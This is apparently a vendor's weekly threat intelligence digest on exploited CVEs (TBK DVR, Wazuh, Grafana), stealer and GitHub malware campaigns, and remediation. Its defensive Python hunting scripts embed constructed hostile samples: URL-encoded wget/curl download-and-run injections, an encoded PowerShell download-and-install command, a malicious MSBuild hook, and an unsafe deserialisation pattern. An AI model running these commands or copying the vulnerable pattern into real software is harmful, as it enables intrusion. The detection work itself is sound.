Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Exploitation of CVE-2024-3721 in TBK DVRs for Mirai Botnet Deployment - On June 6, 2025, Kaspersky reported active exploitation of CVE-2024-3721, a command injection vulnerability in TBK digital video recorder (DVR) systems. Disclosed in April 2024, the flaw affects TBK-DVR-4104 and TBK-DVR-4216 devices up to version 20240412 and stems from improper input handling in the /device.rsp endpoint.
Threat actors are leveraging a proof-of-concept exploit published by “netsecfish” to send crafted POST requests that download and execute a Mirai-based ARM32 binary. The malware features RC4 string encryption, VM detection, and anti-emulation techniques, enabling infected devices to perform DDoS attacks and proxy traffic.
Kaspersky observed exploitation via Linux honeypots, with attacks targeting internet-exposed DVRs in China, India, Egypt, Ukraine, Russia, Türkiye, and Brazil. An estimated 50,000 devices remain vulnerable, and no patch has been released by TBK Vision as of this writing.
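A hunting check for the request pattern described above, written here as an added example (not Kaspersky's or TBK's code). It parses constructed web-server access-log lines for the DVR, URL-decodes the query string (twice, to catch double encoding), and flags POST requests to /device.rsp that carry shell metacharacters or download-and-execute tokens. The log format, addresses and URLs are constructed for the demo, and the parameter names in the samples are placeholders rather than the published PoC's.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not real traffic). Lines 2 and 4 mimic the
# shape of a download-and-execute injection; line 1 is a legitimate-looking request.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Jun/2025:10:01:12 +0000] "POST /device.rsp?opt=sys&cmd=status HTTP/1.1" 200 312
203.0.113.9 - - [06/Jun/2025:10:02:45 +0000] "POST /device.rsp?opt=sys&cmd=x%3Bwget+http%3A%2F%2F198.51.100.5%2Farm7%3Bchmod+777+arm7%3B.%2Farm7 HTTP/1.1" 200 0
203.0.113.9 - - [06/Jun/2025:10:03:01 +0000] "GET /index.html HTTP/1.1" 200 4102
203.0.113.11 - - [06/Jun/2025:10:04:22 +0000] "POST /device.rsp?opt=sys&cmd=x%60curl+198.51.100.5%2Fa.sh%7Csh%60 HTTP/1.1" 500 0
"""

# Common/combined log format: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters that terminate or chain a shell command, and tokens typical of a
# "fetch binary, mark executable, run it" stager.
META_RE = re.compile(r"[;|`]|\$\(|&&|\n")
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget|chmod|busybox)\b", re.I)


def inspect_line(line):
    """Return a finding dict for a suspicious /device.rsp POST, else None."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    parts = urlsplit(m["target"])
    if parts.path != "/device.rsp":
        return None
    decoded = parts.query
    for _ in range(2):              # second pass catches double-encoded payloads
        decoded = unquote_plus(decoded)
    reasons = []
    if META_RE.search(decoded):
        reasons.append("shell metacharacter")
    if DOWNLOAD_RE.search(decoded):
        reasons.append("download/exec token")
    if not reasons:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "status": m["status"],
            "query": decoded, "reasons": reasons}


def hunt(log_text):
    """Run inspect_line over every line and keep the hits."""
    return [hit for hit in (inspect_line(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["reasons"], hit["query"])
```

A 500 response does not mean the injection failed: the DVR's handler may return an error after the shell command has already run, so status codes should not be used to filter hits.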
Threat Actors Actively Exploiting CVE-2025-24016 - Since March 2025, threat actors have been exploiting CVE-2025-24016, an insecure deserialisation vulnerability in Wazuh versions 4.4.0 to 4.9.0, to distribute Mirai malware variants. The flaw, disclosed in February 2025 and patched in version 4.9.1, enables remote code execution via unsanitised JSON deserialisation in the DistributedAPI component. Attackers manipulate the auth_context parameter on the /security/user/authenticate/run_as endpoint, using hard-coded credentials to execute malicious Python code.
Two botnets have exploited this flaw: one deploys LZRD Mirai variants and connects to command-and-control servers including nuklearcnc.duckdns[.]org and cbot.galaxias[.]cc, the latter hosting a disguised Windows RAT. The second, utilising the resgod Mirai variant, targets IoT devices and exploits additional vulnerabilities in Huawei, Realtek, ZyXEL, and TP-Link routers, among others.
Both botnets perform scanning, lateral movement, and malware propagation across multiple protocols. Some infrastructure uses Italian-language domains, suggesting possible targeting of Italian-speaking users.
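To make the bug class concrete, here is an added illustrative example, not Wazuh's code: the `__type__` marker, the `RunAsContext` class and the request bodies are assumptions for the demo. It shows a JSON `object_hook` that instantiates whatever type the client names, beside an allow-listed version that refuses anything outside a fixed mapping. The hostile body names a harmless standard-library class so the demo has no side effects; with the unsafe hook any importable callable could be chosen, which is what turns a deserialisation flaw into remote code execution.

```python
import importlib
import json


class RunAsContext:
    """The benign object an authentication endpoint might legitimately expect."""

    def __init__(self, user, roles):
        self.user, self.roles = user, roles


def _resolve_any(dotted):
    """Turn a client-supplied dotted name into ANY importable attribute."""
    module, _, name = dotted.rpartition(".")
    return getattr(importlib.import_module(module), name) if module else globals()[name]


# --- Vulnerable shape (illustrative only, not Wazuh's code) -------------------
def unsafe_hook(obj):
    # Every JSON object carrying a "__type__" marker is instantiated from whatever
    # class the client named, with client-chosen args: the attacker picks the callable.
    if "__type__" in obj:
        cls = _resolve_any(obj["__type__"])
        return cls(*obj.get("args", []), **obj.get("kwargs", {}))
    return obj


def unsafe_loads(payload):
    return json.loads(payload, object_hook=unsafe_hook)


# --- Hardened shape -----------------------------------------------------------
ALLOWED_TYPES = {"RunAsContext": RunAsContext}


def safe_hook(obj):
    if "__type__" in obj:
        cls = ALLOWED_TYPES.get(obj["__type__"])
        if cls is None:
            raise ValueError(f"refusing to deserialise type {obj['__type__']!r}")
        kwargs = obj.get("kwargs", {})
        # Explicit field mapping with type coercion: no positional args, no extras.
        return cls(user=str(kwargs["user"]),
                   roles=[str(r) for r in kwargs.get("roles", [])])
    return obj


def safe_loads(payload):
    return json.loads(payload, object_hook=safe_hook)


# Constructed request bodies. HOSTILE names a harmless stdlib class to keep the demo
# side-effect free; with the unsafe hook it could equally name an os.system-style callable.
LEGIT = json.dumps({"auth_context": {"__type__": "RunAsContext",
                                     "kwargs": {"user": "alice", "roles": ["reader"]}}})
HOSTILE = json.dumps({"auth_context": {"__type__": "pathlib.PurePosixPath",
                                       "args": ["/etc/passwd"]}})


def demo():
    """Return (type name the unsafe hook produced, whether the safe hook rejected it)."""
    hijacked = unsafe_loads(HOSTILE)["auth_context"]
    try:
        safe_loads(HOSTILE)
        rejected = False
    except ValueError:
        rejected = True
    return type(hijacked).__name__, rejected


if __name__ == "__main__":
    print(demo())
```

The fix is not "validate the string harder": any scheme that maps client-chosen names to code must be a closed allow-list with no dotted-path resolution, and the constructor arguments must be coerced field by field rather than splatted.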
CVE-2025-4123 in Grafana Puts Over 46,000 Instances at Risk via Plugin-Based Exploit - On 15 June 2025, Ox Security reported that around 46,000 Grafana instances remain vulnerable to CVE-2025-4123, also known as Grafana Ghost. Grafana is a widely used open-source platform for analytics and data visualisation. To date, there is no evidence of active exploitation of this vulnerability in the wild.
CVE-2025-4123 is a chained vulnerability combining client-side path traversal with an open redirect, resulting in cross-site scripting (XSS). Exploiting this flaw allows threat actors to craft malicious links, potentially leading to account takeover. The vulnerability was discovered by Alvaro Balada via a bug bounty programme, and Grafana issued a security patch on 21 May 2025.
Potential Threats
DeerStealer Distributed via HijackLoader in ClickFix Social Engineering Campaign - In May 2025, eSentire reported a campaign in which threat actors used HijackLoader to deploy DeerStealer, also known as XFiles spyware. The campaign relied on ClickFix, a social engineering method that manipulates user behaviour to execute malicious PowerShell commands via phishing redirects. This initiated a multi-stage infection chain that ultimately enabled the theft of credentials, browser data, and cryptocurrency wallet information.
The infection process began with victims downloading a malicious MSI installer, which wrote files to the system and abused a signed COMODO binary to sideload a tampered DLL. This redirected execution through shellcode to launch HijackLoader, which used steganography and DLL sideloading to decrypt further payloads and inject DeerStealer into a renamed legitimate binary.
DeerStealer, sold by the dark web actor “LuciferXfiles” as a tiered subscription service, is capable of stealing data from browsers, extensions, email clients, VPNs, FTP tools, messaging apps, and cryptocurrency wallets. It also hijacks clipboard contents, establishes persistence through encrypted command-and-control channels using proxy domains, and enables remote access and file exfiltration via hidden VNC modules. The malware employs extensive obfuscation, including control flow manipulation and custom virtual machine-based string decryption, to avoid detection.
Water Curse Targets Red Teams and Developers via Weaponised GitHub Repositories - On 16 June 2025, Trend Micro reported that a newly identified threat group, Water Curse, is using weaponised GitHub repositories to deliver multistage malware. The group has leveraged at least 76 GitHub accounts to distribute malicious Visual Studio project files embedded with harmful build scripts, primarily targeting red teams, developers, penetration testers, and gamers.
The attack begins when victims download ZIP archives containing Visual Studio projects rigged with batch scripts. These scripts trigger VBScript, which launches obfuscated PowerShell code that downloads encrypted archives. These archives unpack Electron-based applications, which deploy binaries such as SearchFilter.exe to perform system reconnaissance, privilege escalation, anti-analysis, and persistence via scheduled tasks.
Additional payloads are injected into trusted processes like RegAsm.exe. These final-stage components harvest browser data, steal credentials, and profile the system, exfiltrating the data through services like Telegram and Gofile.
DragonHash PoC Tool for NTLM Hash Theft via Chromium Drag-and-Drop Published on GitHub - On June 13, 2025, TrustedSec released DragonHash, a proof-of-concept tool demonstrating how Chromium’s drag-and-drop feature can be abused to steal NTLM hashes from Windows machines.
DragonHash lures the victim into dragging an image from a web page onto the desktop; the drop makes Windows fetch the referenced resource from a threat actor’s SMB server and authenticate automatically. No credential prompt is shown, so the drag itself is the only user action required.
Operators configure DragonHash by embedding their SMB server’s IP into the HTML and hosting the page behind a phishing or social engineering lure. When the victim performs the drag-and-drop, the attacker’s Responder listener captures the NTLM challenge-response (a NetNTLMv2 response in practice, not the raw password hash), which can be cracked offline or relayed to services that still accept NTLM. Blocking outbound SMB (TCP 445) at the perimeter and restricting NTLM remove the vector regardless of the lure used.
As of writing, DragonHash has 17 stars and 2 forks on GitHub. Links to the repository and TrustedSec’s blog are provided in the Validation URL section.
General News
Scattered Spider Targets UK and US Insurance Sector Following Retail Attacks - In June 2025, Google’s Threat Intelligence Group warned that threat actor Scattered Spider has shifted its focus from the retail sector to the insurance industry, particularly in the United States. Several intrusions have been detected, with activity believed to have begun in early June. Victims include Erie Insurance and Philadelphia Insurance Companies, both of which reported network disruptions. While attribution was not confirmed, the tactics match Scattered Spider’s known methods.
Google tracks the campaign under UNC3944, an actor that overlaps with Scattered Spider but with a more specific focus. The group is known for social engineering - posing as internal IT staff to manipulate help desks and call centres - tactics that are effective in large, decentralised insurance firms with outsourced IT operations.
This activity follows a broader wave of Scattered Spider attacks on high-profile retailers in the UK and US, including Marks & Spencer, the Co-op and Harrods, as well as retailers such as Victoria’s Secret, The North Face, Cartier, Adidas, Dior, and Tiffany. The group has also been observed abusing Salesforce tools to escalate access and exfiltrate sensitive data.
WhatsApp Joins Apple’s Legal Battle with UK Government Over Encryption – On June 11, 2025, WhatsApp announced it is seeking to intervene in a legal dispute between Apple and the UK government. The case concerns whether Apple can be compelled to retain access to users’ iCloud content to comply with legal warrants.
The dispute follows an April ruling by the Investigatory Powers Tribunal, which confirmed that Apple had brought a legal challenge against the UK government over a secret legal order. WhatsApp’s CEO, Will Cathcart, said the company wants to protect privacy globally and oppose any law that weakens encryption.
The UK government reportedly issued Apple a Technical Capability Notice (TCN), demanding it halt the rollout of its Advanced Data Protection feature, which enables end-to-end encryption of iCloud content. Apple disabled this feature for UK users in February without confirming the reason.
While the government neither confirms nor denies such legal demands, experts and academics have criticised its secrecy and called for greater transparency. The government maintains TCNs do not grant direct access to data but ensure existing legal powers remain effective and insists the measures are vital to preventing serious crime.
The Investigatory Powers Tribunal has yet to set a timetable for the case.
UK Data Privacy Regulator Fines 23andMe $3M Over Cybersecurity Failures Following 2023 Breach - The UK’s data privacy watchdog has fined personal genomics firm 23andMe over $3 million for poor cybersecurity and a delayed response to a major 2023 data breach exposing millions of customers’ genetic data.
The Information Commissioner’s Office (ICO) said 23andMe failed to implement basic protections such as multifactor authentication and secure passwords and lacked systems to detect or respond to cyber threats. The breach, caused by credential stuffing, began in April 2023 and continued for months before the company fully acknowledged it in October.
Nearly 156,000 UK users had personal data compromised, including family trees and health information. The ICO criticised 23andMe for slow investigation and inadequate security, noting the company only improved protections by the end of 2024.
UK Information Commissioner John Edwards said, “Once this information is out there, it cannot be changed like a password or credit card number. 23andMe failed to take basic steps to protect it.”
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group’s severity. These updates can be seen below.
Legend: ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity

Threat Actor | Severity (previous → current) | Opportunity (previous → current) | Intent (previous → current)
---|---|---|---
Pioneer Kitten | Moderate → ● Moderate | 60 → ● 61 | 25 → ● 25
BO Team | NEW → ● Basic | NEW → ● 49 | NEW → ● 30
Rare Werewolf | NEW → ● Basic | NEW → ● 40 | NEW → ● 25
B14ckHOOD | NEW → ● Basic | NEW → ● 30 | NEW → ● 25
XXX Team Ransomware Group | NEW → ● Basic | NEW → ● 25 | NEW → ● 30
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲ - Spike: a large increase in reporting volume together with high diversity in the event descriptions.
▲ - Rise: a small increase in reporting volume with little diversity in the descriptions.
Attackers | Methods | Vulnerabilities | Targets
---|---|---|---
Predatory Sparrow ▲ | Targeted Attacks ▲ | CVE-2025-2783 ▲ | Banking ▲
JINX-0132 ▲ | Compromised Credentials ▲ | CVE-2023-0386 ▲ | Automotive ▲
Scattered Spider ▲ | Remote Code Execution ▲ | CVE-2024-12168 ▲ | 23andMe ▲
Cyber Av3ngers ▲ | Account Takeover ▲ | CVE-2025-33073 ▲ | Public Transportation ▲
FIN7 ▲ | Cyber spying ▲ | CVE-2021-26855 ▲ | Finance ▲
Prominent Information Security Events
DeerStealer Distributed via HijackLoader in ClickFix Social Engineering Campaign
Source: Insikt Group | Validated Intelligence Event
IOC: URL - hxxps://luckyseaworld[.]com/nownow[.]txt
IOC: Domain Name - brokpolok[.]shop
IOC: SHA256 - 3a03afc1313854359603522e0792f6a8f9153519eac645cf5811824d936cfbc7
In May 2025, eSentire’s Threat Response Unit (TRU) observed a malware campaign in which threat actors used HijackLoader to deploy DeerStealer (also known as XFiles spyware), an information-stealing malware sold by “LuciferXfiles” on the dark web.
The attack chain began with ClickFix, a social engineering technique exploiting user behaviour. Victims were redirected to a phishing page instructing them to run an encoded PowerShell command via the Windows Run prompt. This downloaded a malicious Microsoft Installer (now.msi) from luckyseaworld[.]com, which wrote files to C:\ProgramData\ and launched a signed COMODO binary (EngineX_Co64.exe). The binary sideloaded a tampered cmdres.dll containing a malicious C runtime hook that redirected execution to shellcode, which resolved Windows API hashes and decrypted the next payload.
HijackLoader, active since 2023, is known for hiding configuration data using steganography in PNG files. In this campaign, it performed DLL sideloading and module stomping on vssapi.dll, then decrypted further payloads from an encrypted file (Bairrout.xd) using a custom key and offset. Ultimately, it injected DeerStealer into a renamed legitimate binary (SecureLoader_test.exe, based on Q-Dir) and leveraged d3d9.dll for continued execution.
DeerStealer, marketed under the XFiles Spyware brand, is sold via tiered subscriptions ($200–$3000/month). It includes:
- Credential and data theft: From over 50 browsers, 800+ extensions, email clients, VPNs, FTP clients, messengers, and cryptocurrency wallets.
- Clipboard hijacking: Replaces cryptocurrency addresses copied to the clipboard for 14+ currencies.
- Persistence and C2: Uses HTTPS with custom encryption and proxy domains (“Gasket”) for persistent command-and-control communication and victim fingerprinting.
- Remote access and exfiltration: Includes hidden VNC modules and a FileGrabber tool to exfiltrate selected file types.
- Obfuscation: Employs heavy control-flow obfuscation and virtual machine-based string decryption, hindering analysis and detection.
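The ClickFix stage described above leaves a distinctive process tree: explorer.exe (which hosts the Run prompt) spawning PowerShell with a hidden window and an encoded command. The following is an added example, not eSentire's code and not the campaign's own command: it decodes the `-EncodedCommand` payload from constructed process-creation events and scores each event on those traits. The events, the URL and the file name in them are constructed placeholders; the real first stage fetched now.msi from the domain listed in the IOCs above.

```python
import base64
import re


def encode_ps(cmd):
    """Same transform PowerShell expects for -EncodedCommand (UTF-16LE, then base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (not real telemetry). Event 1 has the ClickFix
# shape: explorer.exe (the Run prompt) spawning hidden, encoded PowerShell that fetches
# and installs an MSI. The URL is a placeholder, not an observed indicator.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc "
                + encode_ps("iwr http://example.invalid/now.msi -OutFile now.msi; msiexec /i now.msi /qn")},
    {"parent": "Code.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -enc " + encode_ps("Get-Service | Where-Object Status -eq Running")},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest alternatives first.
ENC_FLAG_RE = re.compile(r"-(?:encodedcommand|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDE_RE = re.compile(r"-(?:w|win|window|windowstyle)\s+hidden|-nop\b|-noprofile\b|-noni\b", re.I)
FETCH_RE = re.compile(r"\b(?:iwr|invoke-webrequest|iex|invoke-expression|downloadstring|downloadfile|"
                      r"msiexec|start-bitstransfer|curl|mshta)\b|https?://", re.I)


def decode_encoded(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Score one process-creation event; the decoded payload is what gets inspected."""
    cmd = event["cmdline"]
    decoded = decode_encoded(cmd)
    effective = decoded if decoded is not None else cmd
    score, reasons = 0, []
    if event["parent"].lower() == "explorer.exe" and event["image"].lower().startswith("powershell"):
        score += 2
        reasons.append("PowerShell spawned by explorer.exe (Run prompt or double-click)")
    if decoded is not None:
        score += 1
        reasons.append("encoded command")
    if HIDE_RE.search(cmd):
        score += 1
        reasons.append("hidden window / no profile")
    if FETCH_RE.search(effective):
        score += 2
        reasons.append("download or install activity")
    return {"score": score, "reasons": reasons, "decoded": decoded}


def flagged(events, threshold=4):
    """Events scoring at or above the threshold, merged with their triage result."""
    out = []
    for event in events:
        result = triage(event)
        if result["score"] >= threshold:
            out.append({**event, **result})
    return out


if __name__ == "__main__":
    for hit in flagged(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"], hit["decoded"])
```

Because the victim types the command into the Run prompt, the same string is also persisted under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting during triage even when process telemetry is missing.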
Water Curse Targets Red Teams and Developers via Weaponised GitHub Repositories
Source: Insikt Group | Validated Intelligence Event
IOC: IP - 46.101.236[.]176
IOC: SHA-1 - 4c391ebeff4cdfbc87ca83772a535d4386e5a5b2
IOC: URL - hxxps://rlim[.]com/seraswodinsx/rawURL
On June 16, 2025, Trend Micro reported that a newly identified threat group, Water Curse, is leveraging weaponised GitHub repositories to deliver a multistage malware campaign. The group operates at least 76 GitHub accounts, distributing malicious Visual Studio project files embedded with compromised build scripts. Their primary targets include red teams, penetration testers, developers, and gamers.
The attack begins when victims download ZIP archives from GitHub containing Visual Studio projects laced with malicious batch scripts. These trigger VBScript, which executes obfuscated PowerShell responsible for downloading encrypted payloads and extracting Electron-based applications. These apps deploy binaries such as SearchFilter.exe to perform system reconnaissance, privilege escalation, anti-analysis measures, and establish persistence via scheduled tasks.
In the final stage, additional payloads are injected into trusted Windows processes like RegAsm.exe, enabling browser data collection, credential theft, and host profiling. Exfiltration is conducted through services like Telegram and Gofile, helping the malware blend with normal network activity.
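Both the summary entry and the write-up above describe Visual Studio project files whose build events carry the first stage. The following is an added example (not Trend Micro's code; the project file is constructed and the commands in it are placeholders, not Water Curse artefacts) that parses an MSBuild project and flags PreBuild/PostBuild/PreLink events and Exec tasks that invoke living-off-the-land binaries, script files or encoded PowerShell. Running a check like this before building a repository from an untrusted source catches the hook before MSBuild ever executes it.

```python
import re
import xml.etree.ElementTree as ET

# Constructed MSBuild project (not an observed Water Curse sample). One hook runs a
# VBScript before the build, one uses an encoded PowerShell Exec task, one is benign.
SAMPLE_VCXPROJ = r"""<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>cmd /c start /min wscript.exe //B "$(ProjectDir)Resources\updater.vbs"</Command>
    </PreBuildEvent>
    <PostBuildEvent>
      <Command>copy "$(TargetPath)" "$(SolutionDir)bin\"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="BeforeBuild">
    <Exec Command="powershell -w hidden -enc SQBFAFgA" />
  </Target>
</Project>
"""

MSBUILD_EVENTS = {"PreBuildEvent", "PreLinkEvent", "PostBuildEvent"}
LOLBIN_RE = re.compile(
    r"\b(?:cmd|cscript|wscript|powershell|pwsh|mshta|certutil|bitsadmin|curl|rundll32|regsvr32)(?:\.exe)?\b",
    re.I,
)
# Encoded commands, hidden windows, cmd caret/substring obfuscation, inline base64 decoding
ENCODING_RE = re.compile(r"-(?:e|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|FromBase64String|\^|%\w+:~", re.I)
SCRIPT_RE = re.compile(r"\.(?:vbs|vbe|js|bat|cmd|ps1|hta)\b", re.I)


def _local(tag):
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def scan_project(xml_text):
    """Return findings for build events and Exec tasks whose command looks like a stager."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name in MSBUILD_EVENTS:
            cmd_el = next((c for c in el if _local(c.tag) == "Command"), None)
            where, cmd = name, (cmd_el.text or "") if cmd_el is not None else ""
        elif name == "Exec":                       # <Exec Command="..."/> inside any <Target>
            where, cmd = "Exec task", el.get("Command", "")
        else:
            continue
        reasons = []
        if LOLBIN_RE.search(cmd):
            reasons.append("living-off-the-land binary")
        if ENCODING_RE.search(cmd):
            reasons.append("encoding/obfuscation marker")
        if SCRIPT_RE.search(cmd):
            reasons.append("script file invoked")
        if reasons:
            findings.append({"where": where, "command": cmd.strip(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_project(SAMPLE_VCXPROJ):
        print(f"{f['where']}: {f['reasons']} -> {f['command']}")
```

The same check applies to SDK-style .csproj files, where hooks usually appear as `<Target BeforeTargets="Build">` wrapping an `<Exec>` task, and to Directory.Build.props/targets files that MSBuild imports automatically from parent directories of the project.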
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2024-3721: Upgrade affected TBK DVRs to version 21.1050 or later where the vendor makes it available; as noted above, Kaspersky reported no patch at the time of publication, so until one is applied, remove the DVRs’ web interface from the internet, isolate them on a segmented network, and monitor for POST requests to /device.rsp carrying shell metacharacters or download-and-execute commands.
- CVE-2025-4123: Apply the Grafana security release of 21 May 2025 (or later) for your release line; because the Grafana Ghost chain runs in the victim’s browser, every reachable instance must be updated, not only those exposed to the internet.
- CVE-2025-24016: Organisations should update Wazuh to version 4.9.1 or later to address this critical vulnerability and minimise exposure.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.